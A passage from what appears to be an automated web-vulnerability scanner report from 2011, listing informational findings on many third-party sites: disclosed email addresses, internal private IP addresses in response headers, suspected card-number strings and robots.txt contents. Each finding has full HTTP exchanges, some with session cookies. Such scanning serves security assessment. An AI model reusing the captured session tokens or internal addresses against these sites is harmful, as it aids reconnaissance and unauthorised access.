Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3f8jad7n25ekrcbukulr2hcf12

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:27 GMT
Server: Apache
Last-Modified: Sat, 29 Jan 2011 21:58:24 GMT
ETag: "8c547-1217-49b03481e6000"
Accept-Ranges: bytes
Content-Length: 4631
Connection: close
Content-Type: application/x-javascript

/**
* hoverIntent is similar to jQuery's built-in "hover" function except that
* instead of firing the onMouseOver event immediately, hoverIntent checks
* to see if the user's mouse has slowed down
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

20.123. https://www.trustwave.com/web-application-firewall/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustwave.com
Path:   /web-application-firewall/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /web-application-firewall/ HTTP/1.1
Host: www.trustwave.com
Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:15 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Web Application Firewall | Trust
...[SNIP]...
<a onclick="pageTracker._trackEvent('Footer', 'Email', 'mailto:info@trustwave.com')" href="mailto:info@trustwave.com">info@trustwave.com</a>
...[SNIP]...
<a onclick="pageTracker._trackEvent('Footer', 'Email', 'mailto:ir@trustwave.com')" href="mailto:ir@trustwave.com">
...[SNIP]...

20.124. http://www.wallstreetoasis.com/files/js/js_0ab1e26fe2caa039c043f8d9dcf49447.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wallstreetoasis.com
Path:   /files/js/js_0ab1e26fe2caa039c043f8d9dcf49447.js

Issue detail

The following email address was disclosed in the response:

Request

GET /files/js/js_0ab1e26fe2caa039c043f8d9dcf49447.js HTTP/1.1
Host: www.wallstreetoasis.com
Proxy-Connection: keep-alive
Referer: http://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9095464dfa38d76be5c0e87191926453=ba27f64d25c838f1de7819db7dc7e5ce

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:14:10 GMT
Server: Apache/2.2.8 (Ubuntu)
Last-Modified: Thu, 01 Sep 2011 21:24:02 GMT
ETag: "b4a1a3-24815-4abe7dd186080"-gzip
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 16:14:10 GMT
Vary: Accept-Encoding
Content-Length: 149525
Content-Type: application/x-javascript


/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* Date: 2008-05-2
...[SNIP]...
<a href="http://user:pass@example.com">
...[SNIP]...

21. Private IP addresses disclosed  previous  next
There are 6 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


21.1. http://connect.facebook.net/en_US/all.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://connect.facebook.net
Path:   /en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en_US/all.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.skype.com/intl/en-us/prices/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: connect.facebook.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "60d052dfdcb712efb06462cca965645c"
X-FB-Server: 10.33.31.125
X-Cnection: close
Content-Length: 133582
Cache-Control: public, max-age=284
Expires: Sun, 04 Sep 2011 21:18:57 GMT
Date: Sun, 04 Sep 2011 21:14:13 GMT
Connection: close
Vary: Accept-Encoding

/*1314922616,169942909,JIT Construction: v434031,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

21.2. https://connect.facebook.net/en_US/all.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://connect.facebook.net
Path:   /en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en_US/all.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://login.skype.com/account/signup-form?setlang=en&intsrc=client%7Creg-a%7C0%2F5.5.0.114
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: connect.facebook.net
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "f045206b1d47f67757ed8731e14fa4b6"
X-FB-Server: 10.32.119.121
X-Cnection: close
Content-Length: 133702
Expires: Sun, 04 Sep 2011 18:16:18 GMT
Date: Sun, 04 Sep 2011 18:00:21 GMT
Connection: keep-alive
Vary: Accept-Encoding

/*1314921110,169899897,JIT Construction: v434031,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

21.3. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&app_id=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2a6aed888%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1152b646c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df109277398%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1152b646c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df241c3c5bc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1941a025c%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1152b646c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df241c3c5bc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df83c3762%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1152b646c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df241c3c5bc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2edb73188%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1152b646c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df241c3c5bc&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.39.24
X-Cnection: close
Date: Sun, 04 Sep 2011 16:17:38 GMT
Content-Length: 239

<script type="text/javascript">
parent.postMessage("cb=f83c3762&origin=http\u00253A\u00252F\u00252Fonline.wsj.com\u00252Ff1152b646c&relation=parent&transport=postmessage&frame=f241c3c5bc", "http:\/\/o
...[SNIP]...

21.4. http://www.facebook.com/plugins/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/fan.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/fan.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&connections=10&height=250&id=8304333127&locale=en_US&sdk=joey&stream=false&width=377 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.52.48
X-Cnection: close
Date: Sun, 04 Sep 2011 16:17:47 GMT
Content-Length: 11138

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...

21.5. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfec39adc%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1152b646c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fonline.wsj.com%2Farticle%2FSB10001424053111904900904576549933849920392.html%3Fmod%3Dgooglenews_wsj&layout=button_count&locale=en_US&node_type=link&ref=wsj_share_FB&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.74.49
X-Cnection: close
Date: Sun, 04 Sep 2011 16:17:41 GMT
Content-Length: 25056

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.6. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df17ce741a4%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1152b646c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fonline.wsj.com%2Farticle%2FSB10001424053111904900904576549933849920392.html%3Fmod%3Dgooglenews_wsj&layout=standard&locale=en_US&node_type=link&ref=wsj_share_FB_bot&sdk=joey&send=true&show_faces=true&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.39.65
X-Cnection: close
Date: Sun, 04 Sep 2011 16:17:45 GMT
Content-Length: 31215

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

22. Credit card numbers disclosed  previous  next
There are 2 instances of this issue:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.


22.1. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The following credit card number was disclosed in the response:

Request

GET /pagead/ads?client=ca-pub-4358676377058562&format=120x240_as&output=html&h=240&w=120&lmt=1315187729&channel=0946045135&ad_type=text_image&color_bg=ffcc99&color_border=ffcc99&color_link=0000FF&color_text=000000&color_url=008000&flash=0&url=http%3A%2F%2Flwn.net%2FArticles%2F456878%2F%23A&dt=1315187730657&bpp=22&shv=r20110824&jsv=r20110719&correlator=1315187732482&frm=4&adk=3061909479&ga_vid=1342941290.1315138581&ga_sid=1315187735&ga_hid=2135885664&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=18&u_nmime=96&dff=serif&dfs=16&biw=1053&bih=512&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&fu=0&ifi=1&dtd=3892&xpc=xyHj7Ys8ju&p=http%3A//lwn.net HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://lwn.net/Articles/456878/
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 05 Sep 2011 01:54:58 GMT
Server: cafe
Cache-Control: private
Content-Length: 9326
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
___8BYMnW-obIo6AZoAGkxfb2A7IBB2x3bi5uZXS6AQoxMjB4MjQwX2FzyAEB2gEfaHR0cDovL2x3bi5uZXQvQXJ0aWNsZXMvNDU2ODc4L4ACAcACBagDAcgDF-gD4AXoA7oC9QMCAADA&num=1&sig=AOD64_2EnRsF-VQGN8_LKIuHUx49bz0JTw&client=ca-pub-4358676377058562&adurl=http://www.newrelic.com/signup%3Futm_source%3DREMK%26utm_medium%3Dremarketing%26utm_content%3Drpm%26utm_campaign%3DRPM%26utm_term%3Dgraph250%26mpc%3DBA-REMK-RPM-EN-0-Homepage-textad" id=aw0 oncl
...[SNIP]...
<a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://lwn.net/Articles/456878/%26hl%3Den%26client%3Dca-pub-4358676377058562%26adU%3Dnewrelic.com%26adT%3DNew%2BRelic%2BOfficial%2BSite%26gl%3DUS&amp;usg=AFQjCNH-AURX0LDF9F-9ZiTuIMKsp9LqcA" target=_blank>
...[SNIP]...
s:smaRenderAds,getNextAdRequestUrl:smaGetNextAdRequestUrl,maxAds:2,handlerUrl:'http://googleads.g.doubleclick.net/pagead/ads',requestUrl:'http://googleads.g.doubleclick.net/pagead/ads?client\x3dca-pub-4358676377058562\x26format\x3d120x240_as\x26output\x3dhtml\x26h\x3d240\x26w\x3d120\x26lmt\x3d1315187729\x26channel\x3d0946045135\x26ad_type\x3dtext_image\x26color_bg\x3dffcc99\x26color_border\x3dffcc99\x26color_link\x
...[SNIP]...

22.2. http://lwn.net/Articles/456878/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lwn.net
Path:   /Articles/456878/

Issue detail

The following credit card number was disclosed in the response:

Request

GET /Articles/456878/ HTTP/1.1
Host: lwn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=196211505.1342941290.1315138581.1315138581.1315138581.1; __utmz=196211505.1315138581.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 01:54:51 GMT
Server: Apache
Expires: -1
Content-Length: 18541
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>Red Hat alert RHSA-2011:1220-01 (samba3x) [LWN.net]</
...[SNIP]...
<!--
google_ad_client = "pub-4358676377058562";
google_ad_width = 160;
google_ad_height = 90;
google_ad_format = "160x90_0ads_al";
//2007-06-11: LWN Default
google_ad_channel = "9054449711";
google_color_border = "FFCC99";
google_color_bg = "FFCC
...[SNIP]...

23. Robots.txt file  previous  next
There are 91 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


23.1. http://6a.typepad.com/.services/content  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://6a.typepad.com
Path:   /.services/content

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 6a.typepad.com

Response

HTTP/1.1 200 OK
Server: Apache
X-PhApp: oak-tp-web024
X-Webserver: oak-tp-web024
Vary: cookie
Expires: Sat, 27 Aug 2011 00:29:30 GMT
Last-Modified: Wed, 04 Jun 2008 20:59:07 GMT
Content-Disposition: inline; filename=robots.txt
Content-Type: text/plain; charset=utf-8
Keep-Alive: timeout=300, max=100
Content-Length: 181
Date: Mon, 05 Sep 2011 02:23:17 GMT
X-Varnish: 1021226068 110202544
Age: 798827
Via: 1.1 varnish
Connection: close

User-agent: *
Disallow: /t/trackback
Disallow: /t/comments
Disallow: /t/stats
Disallow: /t/app

# weird MSIE thing that keeps hammering
User-agent: Active Cache Request
Disallow: *

23.2. http://ad.adtegrity.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.adtegrity.net
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.adtegrity.net

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 16:19:47 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 04 Sep 2011 16:19:47 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

23.3. http://ad.turn.com/server/pixel.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Mon, 05 Sep 2011 02:30:52 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

23.4. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.yieldmanager.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 16:19:48 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 04 Sep 2011 16:19:48 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

23.5. https://adwords.google.com/um/StartNewLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /um/StartNewLogin

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adwords.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 16:28:57 GMT
Expires: Sun, 04 Sep 2011 16:28:57 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Allow: /support/
Disallow: /

User-Agent: Googlebot
Allow: /
Allow: /support/
Disallow: /*?

23.6. http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /ajax/libs/jquery/1.4.2/jquery.min.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Last-Modified: Mon, 23 Aug 2010 20:43:16 GMT
Date: Sun, 04 Sep 2011 21:22:31 GMT
Expires: Sun, 04 Sep 2011 20:57:44 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=0
Age: 0

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

23.7. http://altfarm.mediaplex.com/ad/ck/12309-80794-34740-0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/ck/12309-80794-34740-0

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1158796162000"
Last-Modified: Wed, 20 Sep 2006 23:49:22 GMT
Content-Type: text/plain
Content-Length: 26
Date: Sun, 04 Sep 2011 16:18:51 GMT
Connection: keep-alive

User-agent: *
Disallow: /

23.8. http://apps.sapha.com/appshandler.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.sapha.com
Path:   /appshandler.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: apps.sapha.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:35 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 11 Dec 2008 02:36:27 GMT
ETag: "d309a75-28-3e4840c0"
Accept-Ranges: bytes
Content-Length: 40
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt
User-agent: *
Disallow: /

23.9. http://apr.lijit.com///www/delivery/ajs.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apr.lijit.com
Path:   ///www/delivery/ajs.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: apr.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:52 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n20 ( lax-agg-n50), ht-d lax-agg-n50.panthercdn.com
ETag: "b8f65-17a-4aad03c64c880"
Cache-Control: max-age=604800
Expires: Wed, 07 Sep 2011 18:48:13 GMT
Age: 373359
Content-Length: 378
Content-Type: text/plain
Last-Modified: Thu, 18 Aug 2011 23:47:30 GMT
Connection: close

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...

23.10. http://cdn.turn.com/server/ddc.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /server/ddc.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
